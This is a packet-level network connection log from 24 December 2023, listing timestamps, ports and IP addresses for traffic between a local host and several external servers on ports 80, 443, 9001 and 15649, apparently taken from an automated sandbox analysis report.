Dec 24, 2023 10:44:30.533318996 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533363104 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533364058 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533404112 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533417940 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533436060 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533454895 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533480883 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533504009 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533521891 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533540010 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533560038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533592939 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533611059 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533646107 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533651114 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533710957 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533725977 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:30.533751011 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533763885 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.533921957 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.538579941 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:30.539278030 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:30.602775097 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:30.602817059 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:30.602931976 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:30.607234001 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:30.607254982 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:30.729063988 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.729124069 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:30.800491095 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:30.800510883 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:30.800584078 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:30.802186012 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:30.872534037 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:30.872632980 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:30.905230999 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:30.905271053 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:30.905514002 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:31.002966881 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:31.019989014 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:31.040796995 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:31.043431044 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:31.043462038 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:31.064905882 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.065249920 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.119184971 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:31.119185925 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:31.119342089 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:31.317302942 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:31.327191114 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327316046 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327398062 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.327507019 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327526093 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327541113 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327567101 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.327676058 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327697992 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327713013 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327722073 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.327754021 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.327764988 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327851057 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.327891111 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.334064960 CET	80	49716	91.215.85.17	192.168.2.5
Dec 24, 2023 10:44:31.425893068 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:31.429827929 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.431389093 CET	49716	80	192.168.2.5	91.215.85.17
Dec 24, 2023 10:44:31.588386059 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.588537931 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.588608980 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.588637114 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.588799000 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.588871956 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.588881969 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.588980913 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.589023113 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.589068890 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.589221954 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.589263916 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.589350939 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.589456081 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.589498043 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.590090036 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590171099 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590212107 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.590244055 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590338945 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590382099 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.590437889 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590501070 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590540886 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.590559959 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590643883 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590684891 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.590707064 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590775967 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.590846062 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.591541052 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.661720037 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:31.661837101 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:31.672327042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.672463894 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.677228928 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.783775091 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:31.849517107 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.849575996 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.849700928 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.849715948 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.849747896 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.849771976 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.849813938 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.849852085 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.849881887 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.849921942 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.849946022 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.849986076 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850040913 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850080013 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850114107 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850153923 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850162029 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850203991 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850277901 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850321054 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850347996 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850393057 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850408077 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850447893 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850476027 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850517035 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850532055 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850615978 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850622892 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850653887 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850697041 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850739002 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850800991 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850841045 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850888014 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.850925922 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.850970030 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851007938 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851054907 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851094961 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851217031 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851250887 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851294994 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851327896 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851372004 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851412058 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851429939 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851466894 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851495028 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851538897 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851562977 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851600885 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851675034 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851713896 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851759911 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851799965 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851844072 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851882935 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851927042 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.851965904 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.851979971 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852019072 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852087975 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852125883 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852202892 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852242947 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852257013 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852293968 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852338076 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852384090 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852406025 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852448940 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852468967 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852509975 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852536917 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852579117 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852623940 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852660894 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.852689028 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.852735043 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:31.896506071 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:31.919878960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920002937 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920064926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920128107 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.920140982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920219898 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920263052 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.920316935 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920399904 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920434952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.920481920 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920572996 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920615911 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.920646906 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920711994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:31.920753956 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:31.931423903 CET	49720	9001	192.168.2.5	103.253.41.98
Dec 24, 2023 10:44:31.954960108 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:31.955070972 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:31.955127001 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:31.960127115 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:31.960143089 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:31.960167885 CET	49722	443	192.168.2.5	172.67.176.11
Dec 24, 2023 10:44:31.960174084 CET	443	49722	172.67.176.11	192.168.2.5
Dec 24, 2023 10:44:32.063468933 CET	15649	49723	212.118.39.73	192.168.2.5
Dec 24, 2023 10:44:32.063524008 CET	49723	15649	192.168.2.5	212.118.39.73
Dec 24, 2023 10:44:32.110533953 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.110577106 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.110599995 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.110625982 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.110754013 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.110796928 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.110801935 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.110840082 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.110867023 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.110907078 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.110919952 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.110958099 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111023903 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111066103 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111090899 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111135006 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111146927 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111186981 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111193895 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111233950 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111294031 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111330986 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111335993 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111372948 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111378908 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111416101 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111430883 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111469984 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111489058 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111529112 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111541033 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111577988 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111588955 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111628056 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111761093 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111797094 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111823082 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111860991 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111886024 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111901999 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.111928940 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.111948013 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112072945 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112113953 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112131119 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112169981 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112190962 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112234116 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112252951 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112293005 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112359047 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112397909 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112407923 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112442017 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.112447023 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.112482071 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.113078117 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.113121033 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.113148928 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.113184929 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.113727093 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.113773108 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.113817930 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.113861084 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.115278006 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.115319014 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.115322113 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.115358114 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116261959 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116317034 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116326094 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116365910 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116389990 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116429090 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116590023 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116630077 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116640091 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116677999 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116697073 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116733074 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116738081 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116775990 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116791964 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116832018 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116842031 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116877079 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.116931915 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.116971970 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117016077 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117064953 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117072105 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117094040 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117120028 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117151022 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117361069 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117393970 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117398977 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117438078 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117444038 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117485046 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117501974 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117558956 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117599964 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117649078 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117665052 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117705107 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117706060 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117750883 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117762089 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117800951 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117825985 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117865086 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117908001 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117944956 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.117949009 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.117975950 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118009090 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118052959 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118069887 CET	9001	49721	192.121.44.26	192.168.2.5
Dec 24, 2023 10:44:32.118108988 CET	49721	9001	192.168.2.5	192.121.44.26
Dec 24, 2023 10:44:32.118125916 CET	9001	49721	192.121.44.26	192.168.2.5
